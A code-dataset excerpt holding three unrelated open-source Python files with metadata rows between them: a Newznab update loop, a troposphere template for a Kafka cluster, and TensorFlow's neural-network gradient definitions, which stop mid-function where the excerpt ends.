# along with Newznab. If not, see <http://www.gnu.org/licenses/>.
NEWZNAB_PATH = "/usr/local/www/newznab/misc/update_scripts"
NEWZNAB_RUN_TIME = 600 # in seconds
update_scripts = ["update_binaries.php", "update_releases.php"]
import datetime
import os
import subprocess
import time
last_execution = datetime.datetime.today()
last_optimise = None
# just do this forever
while True:
# run all our scripts
for cur_script in update_scripts:
cmd = ["php", cur_script]
subprocess.call(cmd, cwd=NEWZNAB_PATH)
# if it's time to optimise then do it
if datetime.datetime.today().hour in (3,15):
if not last_optimise or datetime.datetime.today() - last_optimise > datetime.timedelta(hours=2):
print 'Optimizing database...'
subprocess.call(["php", "optimise_db.php"], cwd=NEWZNAB_PATH)
last_optimise = datetime.datetime.today()
cur_finish_time = datetime.datetime.today()
run_duration = cur_finish_time - last_execution
# if we need to sleep then do it, but only sleep the remainder
if run_duration.seconds < NEWZNAB_RUN_TIME:
sleep_duration = NEWZNAB_RUN_TIME - run_duration.seconds
print 'Sleeping for', sleep_duration, 'seconds'
time.sleep(sleep_duration)
else:
print 'Last run took too long, starting immediately'
last_execution = datetime.datetime.today()
| gpl-3.0 | -7,422,745,014,853,515,000 | 32.508475 | 98 | 0.738493 | false |
balanced-ops/infra-kafka | formation/kafka.py | 1 | 1410 | #!/usr/bin/env python
from confu import atlas
from troposphere import (
Template, FindInMap, GetAtt, Ref, Parameter, Join, Base64, Select, Output,
ec2 as ec2
)
template = Template()
template.add_description('kafka')
atlas.infra_params(template) # ssh_key, Env, Silo
atlas.conf_params(template) # Conf Name, Conf Version, Conf tarball bucket
atlas.instance_params(
template,
roles_default=['kafka', ],
iam_default='kafka',
)
atlas.scaling_params(template)
atlas.mappings(
template,
accounts=[atlas.poundpay],
)
kafka_secgrp = atlas.instance_secgrp(
template,
name="Kafka",
SecurityGroupIngress=[
ec2.SecurityGroupRule(
'Consumers',
IpProtocol='tcp',
FromPort='6667',
ToPort='6667',
CidrIp=atlas.vpc_cidr, #TODO: open 6667 for consumers only.
),
]
)
i_meta_data = {}
atlas.cfn_auth_metadata(i_meta_data)
atlas.cfn_init_metadata(i_meta_data)
i_launchconf = atlas.instance_launchconf(
template,
"KAFKA",
Metadata=i_meta_data,
SecurityGroups=[Ref(kafka_secgrp)],
)
scaling_group = atlas.instance_scalegrp(
template,
'Kafka',
LaunchConfigurationName=Ref(i_launchconf),
MinSize=Ref('MinSize'),
MaxSize=Ref('MaxSize'),
DesiredCapacity=Ref('DesiredCapacity'),
)
if __name__ == '__main__':
print template.to_json(indent=4, sort_keys=True)
| mit | 3,653,141,776,570,159,000 | 20.692308 | 78 | 0.653191 | false |
Intel-Corporation/tensorflow | tensorflow/python/ops/nn_grad.py | 1 | 37589 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Gradients for operators defined in nn_ops.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_nn_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
@ops.RegisterGradient("Conv2DBackpropInput")
def _Conv2DBackpropInputGrad(op, grad):
"""The derivatives for deconvolution.
Args:
op: the Deconvolution op.
grad: the tensor representing the gradient w.r.t. the output
Returns:
the gradients w.r.t. the input and the filter
"""
return [
None,
nn_ops.conv2d_backprop_filter(
grad,
array_ops.shape(op.inputs[1]),
op.inputs[2],
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
use_cudnn_on_gpu=op.get_attr("use_cudnn_on_gpu"),
data_format=op.get_attr("data_format").decode()),
nn_ops.conv2d(
grad,
op.inputs[1],
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
use_cudnn_on_gpu=op.get_attr("use_cudnn_on_gpu"),
data_format=op.get_attr("data_format").decode())
]
@ops.RegisterGradient("Conv2DBackpropFilter")
def _Conv2DBackpropFilterGrad(op, grad):
return [
nn_ops.conv2d_backprop_input(
array_ops.shape(op.inputs[0]),
grad,
op.inputs[2],
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
use_cudnn_on_gpu=op.get_attr("use_cudnn_on_gpu"),
data_format=op.get_attr("data_format").decode()), None,
nn_ops.conv2d(
op.inputs[0],
grad,
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
use_cudnn_on_gpu=op.get_attr("use_cudnn_on_gpu"),
data_format=op.get_attr("data_format").decode())
]
@ops.RegisterGradient("DepthwiseConv2dNativeBackpropInput")
def _DepthwiseConv2dNativeBackpropInputGrad(op, grad):
"""The derivatives for deconvolution.
Args:
op: the Deconvolution op.
grad: the tensor representing the gradient w.r.t. the output
Returns:
the gradients w.r.t. the input and the filter
"""
return [
None,
nn_ops.depthwise_conv2d_native_backprop_filter(
grad,
array_ops.shape(op.inputs[1]),
op.inputs[2],
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format")),
nn_ops.depthwise_conv2d_native(
grad,
op.inputs[1],
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format"))
]
@ops.RegisterGradient("DepthwiseConv2dNativeBackpropFilter")
def _DepthwiseConv2dNativeBackpropFilterGrad(op, grad):
return [
nn_ops.depthwise_conv2d_native_backprop_input(
array_ops.shape(op.inputs[0]),
grad,
op.inputs[2],
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format")), None,
nn_ops.depthwise_conv2d_native(
op.inputs[0],
grad,
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format"))
]
@ops.RegisterGradient("Conv3D")
def _Conv3DGrad(op, grad):
data_format = op.get_attr("data_format").decode()
return [
nn_ops.conv3d_backprop_input_v2(
array_ops.shape(op.inputs[0]),
op.inputs[1],
grad,
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=data_format),
nn_ops.conv3d_backprop_filter_v2(
op.inputs[0],
array_ops.shape(op.inputs[1]),
grad,
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=data_format)
]
@ops.RegisterGradient("Conv3DBackpropInputV2")
def _Conv3DBackpropInputGrad(op, grad):
data_format = op.get_attr("data_format").decode()
return [
None,
nn_ops.conv3d_backprop_filter_v2(
grad,
array_ops.shape(op.inputs[1]),
op.inputs[2],
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=data_format),
nn_ops.conv3d(
grad,
op.inputs[1],
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=data_format)
]
@ops.RegisterGradient("Conv3DBackpropFilterV2")
def _Conv3DBackpropFilterGrad(op, grad):
data_format = op.get_attr("data_format").decode()
return [
nn_ops.conv3d_backprop_input_v2(
array_ops.shape(op.inputs[0]),
grad,
op.inputs[2],
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=data_format), None,
nn_ops.conv3d(
op.inputs[0],
grad,
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=data_format)
]
@ops.RegisterGradient("AvgPool3D")
def _AvgPool3DGrad(op, grad):
return gen_nn_ops.avg_pool3d_grad(
array_ops.shape(op.inputs[0]),
grad,
ksize=op.get_attr("ksize"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format").decode())
@ops.RegisterGradient("AvgPool3DGrad")
def _AvgPool3DGradGrad(op, grad):
return (array_ops.stop_gradient(op.inputs[0]),
gen_nn_ops.avg_pool3d(
grad,
op.get_attr("ksize"),
op.get_attr("strides"),
op.get_attr("padding"),
data_format=op.get_attr("data_format").decode()))
@ops.RegisterGradient("MaxPool3D")
def _MaxPool3DGrad(op, grad):
return gen_nn_ops.max_pool3d_grad(
op.inputs[0],
op.outputs[0],
grad,
ksize=op.get_attr("ksize"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format").decode())
@ops.RegisterGradient("MaxPool3DGrad")
def _MaxPool3DGradGrad(op, grad):
return (array_ops.zeros(
shape=array_ops.shape(op.inputs[0]), dtype=op.inputs[0].dtype),
array_ops.zeros(
shape=array_ops.shape(op.inputs[1]), dtype=op.inputs[1].dtype),
gen_nn_ops.max_pool3d_grad_grad(
op.inputs[0],
op.inputs[1],
grad,
op.get_attr("ksize"),
op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format").decode()))
@ops.RegisterGradient("MaxPool3DGradGrad")
def _MaxPool3DGradGradGrad(op, grad):
return (array_ops.zeros(
shape=array_ops.shape(op.inputs[0]), dtype=op.inputs[0].dtype),
array_ops.zeros(
shape=array_ops.shape(op.inputs[1]), dtype=op.inputs[1].dtype),
gen_nn_ops.max_pool3d_grad(
op.inputs[0],
op.inputs[1],
grad,
op.get_attr("ksize"),
op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format").decode()))
@ops.RegisterGradient("Softmax")
def _SoftmaxGrad(op, grad_softmax):
"""The derivative of the softmax nonlinearity.
We assume that probs is of shape [batch_size * dim]
The formula for dsoftmax / dx = (diag(softmax) - softmax * softmax').
This matrix is diagonal minus a rank one matrix, so it is easy to implement
as follows:
grad_x = grad_softmax * softmax - sum(grad_softmax * softmax) * softmax
Args:
op: the Softmax op.
grad_softmax: the tensor representing the gradient w.r.t. the softmax
output.
Returns:
gradient w.r.t the input to the softmax
"""
softmax = op.outputs[0]
sum_channels = math_ops.reduce_sum(grad_softmax * softmax, -1, keepdims=True)
return (grad_softmax - sum_channels) * softmax
@ops.RegisterGradient("LogSoftmax")
def _LogSoftmaxGrad(op, grad):
"""The gradient for log_softmax.
log_softmax = input - log(sum(exp(input))
dlog_softmax/dinput = diag - softmax(input)
Args:
op: The log softmax op.
grad: The tensor representing the gradient w.r.t. the output.
Returns:
The gradients w.r.t. the input.
"""
softmax = math_ops.exp(op.outputs[0])
return grad - math_ops.reduce_sum(grad, -1, keepdims=True) * softmax
@ops.RegisterGradient("BiasAdd")
def _BiasAddGrad(op, received_grad):
"""Return the gradients for the 2 inputs of bias_op.
The first input of unused_bias_op is the tensor t, and its gradient is
just the gradient the unused_bias_op received.
The second input of unused_bias_op is the bias vector which has one fewer
dimension than "received_grad" (the batch dimension.) Its gradient is the
received gradient Summed on the batch dimension, which is the first dimension.
Args:
op: The BiasOp for which we need to generate gradients.
received_grad: Tensor. The gradients passed to the BiasOp.
Returns:
Two tensors, the first one for the "tensor" input of the BiasOp,
the second one for the "bias" input of the BiasOp.
"""
try:
data_format = op.get_attr("data_format")
except ValueError:
data_format = None
return (received_grad,
gen_nn_ops.bias_add_grad(
out_backprop=received_grad, data_format=data_format))
@ops.RegisterGradient("BiasAddGrad")
def _BiasAddGradGrad(op, received_grad):
"""Gradient for the BiasAddGrad op.
Args:
op: BiasAddGrad op for which we are calculating gradients.
received_grad: The gradients passed to the BiasAddGrad op.
Returns:
A single gradient Tensor for the input to BiasAddGrad (which
is the gradient of the bias term in BiasAdd)
"""
try:
data_format = op.get_attr("data_format")
except ValueError:
data_format = None
shape = array_ops.shape(op.inputs[0])
bias_shape = array_ops.shape(received_grad)
if data_format == b"NCHW":
expanded_shape = array_ops.concat([
array_ops.ones_like(shape[:1]), bias_shape,
array_ops.ones_like(shape[2:])
], 0)
tile_mults = array_ops.concat([shape[:1], [1], shape[2:]], 0)
else:
expanded_shape = array_ops.concat(
[array_ops.ones_like(shape[:-1]), bias_shape], 0)
tile_mults = array_ops.concat([shape[:-1], [1]], 0)
expanded_grad = array_ops.reshape(received_grad, expanded_shape)
return array_ops.tile(expanded_grad, tile_mults)
@ops.RegisterGradient("BiasAddV1")
def _BiasAddGradV1(unused_bias_op, received_grad):
"""Return the gradients for the 2 inputs of bias_op.
The first input of unused_bias_op is the tensor t, and its gradient is
just the gradient the unused_bias_op received.
The second input of unused_bias_op is the bias vector which has one fewer
dimension than "received_grad" (the batch dimension.) Its gradient is the
received gradient Summed on the batch dimension, which is the first dimension.
Args:
unused_bias_op: The BiasOp for which we need to generate gradients.
received_grad: Tensor. The gradients passed to the BiasOp.
Returns:
Two tensors, the first one for the "tensor" input of the BiasOp,
the second one for the "bias" input of the BiasOp.
"""
reduction_dim_tensor = math_ops.range(array_ops.rank(received_grad) - 1)
return (received_grad, math_ops.reduce_sum(received_grad,
reduction_dim_tensor))
@ops.RegisterGradient("Relu")
def _ReluGrad(op, grad):
return gen_nn_ops.relu_grad(grad, op.outputs[0])
@ops.RegisterGradient("EluGrad")
def _EluGradGrad(op, grad):
elu_x = op.inputs[1]
return (gen_nn_ops.elu_grad(grad, op.outputs[0]),
array_ops.where(
elu_x < 0, grad * op.inputs[0],
array_ops.zeros(shape=array_ops.shape(elu_x), dtype=elu_x.dtype)))
@ops.RegisterGradient("SeluGrad")
def _SeluGradGrad(op, grad):
x = op.inputs[1]
scale_alpha = 1.7580993408473768599402175208123
return (gen_nn_ops.elu_grad(grad, op.outputs[0]),
array_ops.where(
x < 0., gen_nn_ops.elu_grad(grad, op.outputs[0] + scale_alpha),
array_ops.zeros(shape=array_ops.shape(x), dtype=x.dtype)))
@ops.RegisterGradient("Relu6")
def _Relu6Grad(op, grad):
return gen_nn_ops.relu6_grad(grad, op.outputs[0])
@ops.RegisterGradient("Relu6Grad")
def _Relu6GradGrad(op, grad):
x = op.inputs[1]
return (gen_nn_ops.relu6_grad(grad, x),
array_ops.zeros(shape=array_ops.shape(x), dtype=x.dtype))
@ops.RegisterGradient("LeakyRelu")
def _LeakyReluGrad(op, grad):
x = op.inputs[0]
alpha = op.get_attr("alpha")
return gen_nn_ops.leaky_relu_grad(grad, x, alpha=alpha)
@ops.RegisterGradient("LeakyReluGrad")
def _LeakyReluGradGrad(op, grad):
x = op.inputs[1]
alpha = op.get_attr("alpha")
return (gen_nn_ops.leaky_relu_grad(grad, x, alpha=alpha),
array_ops.zeros(shape=array_ops.shape(x), dtype=x.dtype))
@ops.RegisterGradient("Elu")
def _EluGrad(op, grad):
return gen_nn_ops.elu_grad(grad, op.outputs[0])
@ops.RegisterGradient("Selu")
def _SeluGrad(op, grad):
return gen_nn_ops.selu_grad(grad, op.outputs[0])
@ops.RegisterGradient("Softplus")
def _SoftplusGrad(op, grad):
return grad * math_ops.sigmoid(op.inputs[0])
@ops.RegisterGradient("SoftplusGrad")
def _SoftplusGradGrad(op, grad):
# Let:
# y = tf.nn.softplus(x)
# dx = gen_nn_ops.softplus_grad(dy, x) = dy / (1 + exp(-x))
# This op computes (ddy, d2x) from op.inputs == [dy, x] and grad == ddx.
dy, x = op.inputs
with ops.control_dependencies([grad]):
ddy = gen_nn_ops.softplus_grad(grad, x)
d2x = grad * dy / (math_ops.exp(-x) + 2.0 + math_ops.exp(x))
return (ddy, d2x)
@ops.RegisterGradient("Softsign")
def _SoftsignGrad(op, grad):
return gen_nn_ops.softsign_grad(grad, op.inputs[0])
@ops.RegisterGradient("ReluGrad")
def _ReluGradGrad(op, grad):
x = op.inputs[1]
return (gen_nn_ops.relu_grad(grad, x),
array_ops.zeros(shape=array_ops.shape(x), dtype=x.dtype))
def _BroadcastMul(vec, mat):
"""Multiply after broadcasting vec to match dimensions of mat.
Args:
vec: A 1-D tensor of dimension [D0]
mat: A 2-D tensor of dimension [D0, D1]
Returns:
A tensor of dimension [D0, D1], the result of vec * mat
"""
# Reshape vec to [D0, 1]
vec = array_ops.expand_dims(vec, -1)
return vec * mat
@ops.RegisterGradient("SoftmaxCrossEntropyWithLogits")
def _SoftmaxCrossEntropyWithLogitsGrad(op, grad_loss, grad_grad):
"""Gradient function for SoftmaxCrossEntropyWithLogits."""
# grad_loss is the backprop for cost, and we multiply it with the gradients
# (which is output[1])
# grad_grad is the backprop for softmax gradient.
#
# Second derivative is just softmax derivative w.r.t. logits.
softmax_grad = op.outputs[1]
grad = _BroadcastMul(grad_loss, softmax_grad)
def IsZero(g):
# Some introspection to check if the gradient is feeding zeros
if context.executing_eagerly():
# TODO(apassos) add an efficient way to detect eager zeros here.
return False
if g.op.type in ("ZerosLike", "Zeros"):
return True
const_fill_value = tensor_util.constant_value(g)
return const_fill_value is not None and (const_fill_value == 0).all()
logits = op.inputs[0]
if grad_grad is not None and not IsZero(grad_grad):
softmax = nn_ops.softmax(logits)
grad += ((grad_grad - array_ops.squeeze(
math_ops.matmul(
array_ops.expand_dims(grad_grad, 1),
array_ops.expand_dims(softmax, 2)),
axis=1)) * softmax)
return grad, _BroadcastMul(grad_loss, -nn_ops.log_softmax(logits))
@ops.RegisterGradient("SparseSoftmaxCrossEntropyWithLogits")
def _SparseSoftmaxCrossEntropyWithLogitsGrad(op, grad_0, _):
"""Gradient function for SparseSoftmaxCrossEntropyWithLogits."""
# grad_0 is the backprop for cost, and we multiply it with the gradients
# (which is output[1])
# There is no gradient for the labels
#
# Currently there is no way to take the second derivative of this op
# due to the fused implementation's interaction with tf.gradients(),
# so we make sure we prevent silently incorrect results by raising
# an error if the second derivative is requested via prevent_gradient.
sparse_softmax_grad_without_gradient = array_ops.prevent_gradient(
op.outputs[1],
message="Currently there is no way to take the second "
"derivative of sparse_softmax_cross_entropy_with_logits due to the fused "
"implementation's interaction with tf.gradients()")
return _BroadcastMul(grad_0, sparse_softmax_grad_without_gradient), None
@ops.RegisterGradient("Conv2D")
def _Conv2DGrad(op, grad):
"""Gradient function for Conv2D."""
dilations = op.get_attr("dilations")
strides = op.get_attr("strides")
padding = op.get_attr("padding")
explicit_paddings = op.get_attr("explicit_paddings")
use_cudnn_on_gpu = op.get_attr("use_cudnn_on_gpu")
data_format = op.get_attr("data_format")
shape_0, shape_1 = array_ops.shape_n([op.inputs[0], op.inputs[1]])
# We call the gen_nn_ops backprop functions instead of nn_ops backprop
# functions for performance reasons in Eager mode. gen_nn_ops functions take a
# `explicit_paddings` parameter, but nn_ops functions do not. So if were were
# to use the nn_ops functions, we would have to convert `padding` and
# `explicit_paddings` into a single `padding` parameter, increasing overhead
# in Eager mode.
return [
gen_nn_ops.conv2d_backprop_input(
shape_0,
op.inputs[1],
grad,
dilations=dilations,
strides=strides,
padding=padding,
explicit_paddings=explicit_paddings,
use_cudnn_on_gpu=use_cudnn_on_gpu,
data_format=data_format),
gen_nn_ops.conv2d_backprop_filter(
op.inputs[0],
shape_1,
grad,
dilations=dilations,
strides=strides,
padding=padding,
explicit_paddings=explicit_paddings,
use_cudnn_on_gpu=use_cudnn_on_gpu,
data_format=data_format)
]
@ops.RegisterGradient("DepthwiseConv2dNative")
def _DepthwiseConv2dNativeGrad(op, grad):
return [
nn_ops.depthwise_conv2d_native_backprop_input(
array_ops.shape(op.inputs[0]),
op.inputs[1],
grad,
op.get_attr("strides"),
op.get_attr("padding"),
data_format=op.get_attr("data_format")),
nn_ops.depthwise_conv2d_native_backprop_filter(
op.inputs[0],
array_ops.shape(op.inputs[1]),
grad,
op.get_attr("strides"),
op.get_attr("padding"),
data_format=op.get_attr("data_format"))
]
@ops.RegisterGradient("Dilation2D")
def _Dilation2DGrad(op, grad):
return [
nn_ops.dilation2d_backprop_input(op.inputs[0], op.inputs[1], grad,
op.get_attr("strides"),
op.get_attr("rates"),
op.get_attr("padding")),
nn_ops.dilation2d_backprop_filter(op.inputs[0], op.inputs[1], grad,
op.get_attr("strides"),
op.get_attr("rates"),
op.get_attr("padding"))
]
@ops.RegisterGradient("LRN")
def _LRNGrad(op, grad):
depth_radius = op.get_attr("depth_radius")
bias = op.get_attr("bias")
alpha = op.get_attr("alpha")
beta = op.get_attr("beta")
return [
gen_nn_ops.lrn_grad(grad, op.inputs[0], op.outputs[0], depth_radius, bias,
alpha, beta)
]
@ops.RegisterGradient("AvgPool")
def _AvgPoolGrad(op, grad):
return gen_nn_ops.avg_pool_grad(
array_ops.shape(op.inputs[0]),
grad,
op.get_attr("ksize"),
op.get_attr("strides"),
op.get_attr("padding"),
data_format=op.get_attr("data_format"))
@ops.RegisterGradient("AvgPoolGrad")
def _AvgPoolGradGrad(op, grad):
return (array_ops.stop_gradient(op.inputs[0]),
gen_nn_ops.avg_pool(
grad,
op.get_attr("ksize"),
op.get_attr("strides"),
op.get_attr("padding"),
data_format=op.get_attr("data_format")))
@ops.RegisterGradient("MaxPool")
def _MaxPoolGrad(op, grad):
return gen_nn_ops.max_pool_grad(
op.inputs[0],
op.outputs[0],
grad,
op.get_attr("ksize"),
op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format"))
@ops.RegisterGradient("MaxPoolV2")
def _MaxPoolGradV2(op, grad):
ksize = op.inputs[1]
strides = op.inputs[2]
return gen_nn_ops.max_pool_grad_v2(
op.inputs[0],
op.outputs[0],
grad,
ksize,
strides,
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format")), None, None
@ops.RegisterGradient("MaxPoolWithArgmax")
def _MaxPoolGradWithArgmax(op, grad, unused_argmax_grad):
del unused_argmax_grad
return gen_nn_ops.max_pool_grad_with_argmax(
op.inputs[0],
grad,
op.outputs[1],
op.get_attr("ksize"),
op.get_attr("strides"),
padding=op.get_attr("padding"),
include_batch_in_index=op.get_attr("include_batch_in_index"))
@ops.RegisterGradient("MaxPoolGrad")
def _MaxPoolGradGrad(op, grad):
return (array_ops.zeros(
shape=array_ops.shape(op.inputs[0]), dtype=op.inputs[0].dtype),
array_ops.zeros(
shape=array_ops.shape(op.inputs[1]), dtype=op.inputs[1].dtype),
gen_nn_ops.max_pool_grad_grad(
op.inputs[0],
op.inputs[1],
grad,
op.get_attr("ksize"),
op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format")))
@ops.RegisterGradient("MaxPoolGradV2")
def _MaxPoolGradGradV2(op, grad):
ksize = op.inputs[3]
strides = op.inputs[4]
return (array_ops.zeros(
shape=array_ops.shape(op.inputs[0]), dtype=op.inputs[0].dtype),
array_ops.zeros(
shape=array_ops.shape(op.inputs[1]), dtype=op.inputs[1].dtype),
gen_nn_ops.max_pool_grad_grad_v2(
op.inputs[0],
op.inputs[1],
grad,
ksize,
strides,
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format")), None, None)
@ops.RegisterGradient("MaxPoolGradGrad")
def _MaxPoolGradGradGrad(op, grad):
return (array_ops.zeros(
shape=array_ops.shape(op.inputs[0]), dtype=op.inputs[0].dtype),
array_ops.zeros(
shape=array_ops.shape(op.inputs[1]), dtype=op.inputs[1].dtype),
gen_nn_ops.max_pool_grad(
op.inputs[0],
op.inputs[1],
grad,
op.get_attr("ksize"),
op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format")))
@ops.RegisterGradient("FractionalMaxPool")
def _FractionalMaxPoolGrad(op, grad_0, unused_grad_1, unused_grad_2):
"""Returns gradient for FractionalMaxPool.
Since FractionalMaxPool has three outputs, there are three gradients passed in
for each of the outputs. Only the first one is useful, the other two gradients
are empty.
Args:
op: The FractionalMaxPoolOp.
grad_0: Gradient with respect to op.outputs[0]
unused_grad_1: Gradient with respect to op.outputs[1]/row_seq. It is empty.
unused_grad_2: Gradient with respect to op.outputs[2]/col_seq. It is empty.
Returns:
Input backprop for FractionalMaxPool op.
"""
return gen_nn_ops.fractional_max_pool_grad(
op.inputs[0], op.outputs[0], grad_0, op.outputs[1], op.outputs[2],
op.get_attr("overlapping"))
@ops.RegisterGradient("FractionalAvgPool")
def _FractionalAvgPoolGrad(op, grad_0, unused_grad_1, unused_grad_2):
"""Returns gradient for FractionalAvgPool.
Since FractionalAvgPool has three outputs, there are three gradients passed in
for each of the outputs. Only the first one is useful, the other two gradients
are empty.
Args:
op: The FractionalAvgPoolOp.
grad_0: Gradient with respect to op.outputs[0]
unused_grad_1: Gradient with respect to op.outputs[1]/row_seq. It is empty.
unused_grad_2: Gradient with respect to op.outputs[2]/col_seq. It is empty.
Returns:
Input backprop for FractionalAvgPool op.
"""
return gen_nn_ops.fractional_avg_pool_grad(op.inputs[0].get_shape(), grad_0,
op.outputs[1], op.outputs[2],
op.get_attr("overlapping"))
@ops.RegisterGradient("BatchNormWithGlobalNormalization")
def _BatchNormWithGlobalNormalizationGrad(op, grad):
"""Return the gradients for the 5 inputs of BatchNormWithGlobalNormalization.
We do not backprop anything for the mean and var intentionally as they are
not being trained with backprop in the operation.
Args:
op: The BatchNormOp for which we need to generate gradients.
grad: Tensor. The gradients passed to the BatchNormOp.
Returns:
dx: Backprop for input, which is (grad * (g * rsqrt(v + epsilon)))
dm: Backprop for mean, which is
sum_over_rest(grad * g) * (-1 / rsqrt(v + epsilon))
dv: Backprop for variance, which is
sum_over_rest(grad * g * (x - m)) * (-1/2) * (v + epsilon) ^ (-3/2)
db: Backprop for beta, which is grad reduced in all except the
last dimension.
dg: Backprop for gamma, which is (grad * ((x - m) * rsqrt(v + epsilon)))
"""
dx, dm, dv, db, dg = gen_nn_ops.batch_norm_with_global_normalization_grad(
op.inputs[0], op.inputs[1], op.inputs[2], op.inputs[4], grad,
op.get_attr("variance_epsilon"), op.get_attr("scale_after_normalization"))
return dx, dm, dv, db, dg
def _BaseFusedBatchNormGrad(op, use_v2, *grad):
"""Return the gradients for the 3 inputs of BatchNorm.
Args:
op: The BatchNormOp for which we need to compute gradients.
use_v2: Boolean indicating whether to use the V2 version of the fused batch
norm gradient.
*grad: An argument list for tensors of gradients wrt the outputs with
grad[0] as grad_y.
Returns:
grad_x: gradient for x, which is scale * rsqrt(variance + epsilon) *
[grad_y - mean(grad_y) - (x - mean(x)) *
mean(grad_y * (x - mean(x))) / (variance + epsilon)]
in training mode; grad_y * scale * rsqrt(pop_variance + epsilon)
in freeze mode.
grad_scale: gradient for scale, which is sum(grad_y * (x - mean(x)) *
rsqrt(variance + epsilon)) in training mode;
sum(grad_y * (x - pop_mean) * rsqrt(pop_variance + epsilon))
in freeze mode.
grad_offset: gradient for offset, which is sum(grad_y) in training mode;
sum(grad_y) in freeze mode.
"""
x = op.inputs[0]
grad_y = grad[0]
scale = op.inputs[1]
epsilon = op.get_attr("epsilon")
data_format = op.get_attr("data_format")
is_training = op.get_attr("is_training")
grad_fun = (
gen_nn_ops.fused_batch_norm_grad_v2
if use_v2 else gen_nn_ops.fused_batch_norm_grad)
if is_training:
return grad_fun(
grad_y,
x,
scale,
op.outputs[3],
op.outputs[4],
epsilon=epsilon,
data_format=data_format,
is_training=is_training)
else:
pop_mean = op.inputs[3]
pop_var = op.inputs[4]
if data_format == b"NCHW":
x = array_ops.transpose(x, [0, 2, 3, 1])
grad_y = array_ops.transpose(grad_y, [0, 2, 3, 1])
dx, dscale, doffset, _, _ = grad_fun(
grad_y,
x,
scale,
pop_mean,
pop_var,
epsilon=epsilon,
data_format="NHWC",
is_training=is_training)
if data_format == b"NCHW":
dx = array_ops.transpose(dx, [0, 3, 1, 2])
return dx, dscale, doffset, None, None
@ops.RegisterGradient("FusedBatchNorm")
def _FusedBatchNormGrad(op, *grad):
return _BaseFusedBatchNormGrad(op, False, *grad)
@ops.RegisterGradient("FusedBatchNormV2")
def _FusedBatchNormV2Grad(op, *grad):
return _BaseFusedBatchNormGrad(op, True, *grad)
def _BatchNormGrad(grad_y,
x,
scale,
pop_mean,
pop_var,
epsilon,
data_format,
is_training=True):
"""Returns the gradients for the 3 inputs of BatchNorm.
Args:
grad_y: A `Tensor` of 4 dimensions for gradient for y.
x: A `Tensor` of 4 dimensions for x.
scale: A `Tensor` of 1 dimension for scaling.
pop_mean: A `Tensor` of 1 dimension for the population mean. Only used when
is_training=False.
pop_var: A `Tensor` of 1 dimension for the population variance. Only used
when is_training=False.
epsilon: A small float number added to the variance of x.
data_format: The data format for input. Either b"NHWC" or b"NCHW".
is_training: A bool value to indicate the operation is for training
(default) or inference.
Returns:
A tuple (grad_x, grad_scale, grad_offset), where grad_x is the gradient
for x, grad_scale the gradient for scale, and grad_offset the gradient
for offset.
"""
x_dtype = x.dtype.base_dtype
if x_dtype == dtypes.float16:
# float16 math is too imprecise, so we do the batch norm gradient
# computations in float32.
x = math_ops.cast(x, dtypes.float32)
grad_y = math_ops.cast(grad_y, dtypes.float32)
if is_training:
if data_format == b"NHWC":
keepdims = False
reduce_axis = [0, 1, 2]
else:
keepdims = True
reduce_axis = [0, 2, 3]
shape = [1, array_ops.size(scale), 1, 1]
scale = array_ops.reshape(scale, shape)
mean_grad_y = math_ops.reduce_mean(grad_y, reduce_axis, keepdims=keepdims)
mean_x = math_ops.reduce_mean(x, reduce_axis, keepdims=keepdims)
var_x = math_ops.reduce_mean(
math_ops.squared_difference(x, array_ops.stop_gradient(mean_x)),
reduce_axis,
keepdims=keepdims)
grad_y_offset = grad_y - mean_grad_y
x_offset = x - mean_x
mean = math_ops.reduce_mean(
grad_y * x_offset, axis=reduce_axis, keepdims=keepdims)
grad_x = scale * math_ops.rsqrt(var_x + epsilon) * (
grad_y_offset - math_ops.reciprocal(var_x + epsilon) * mean * x_offset)
